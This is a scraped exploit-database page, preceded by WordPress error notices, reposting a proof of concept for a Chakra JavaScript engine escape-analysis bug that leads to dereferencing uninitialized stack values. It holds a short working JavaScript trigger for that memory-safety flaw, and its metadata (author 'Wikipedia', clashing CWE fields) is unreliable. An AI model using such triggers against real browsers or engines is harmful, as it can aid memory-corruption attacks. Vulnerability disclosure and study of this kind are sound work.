Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Chakra fails to detect if "tmp" escapes the scope - exploit.company
header-logo
Suggest Exploit
vendor:
Chakra
by:
Wikipedia
7.5
CVSS
HIGH
Escape Analysis
843
CWE
Product Name: Chakra
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2020

Chakra fails to detect if “tmp” escapes the scope

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values. The proof of concept code shows that when the function opt() is called, the variable tmp is allocated to the stack and when the function main() is called, the variable tmp is dereferenced which leads to uninitialized stack values.

Mitigation:

Ensure that the scope of the variables is properly checked and that the variables are initialized before use.
Source

Exploit-DB raw data:

/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.

PoC:
*/

function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt());  // deref uninitialized stack pointers!
}

main();

Navigation

Suggest Exploit

Services By CQR

cqrsecured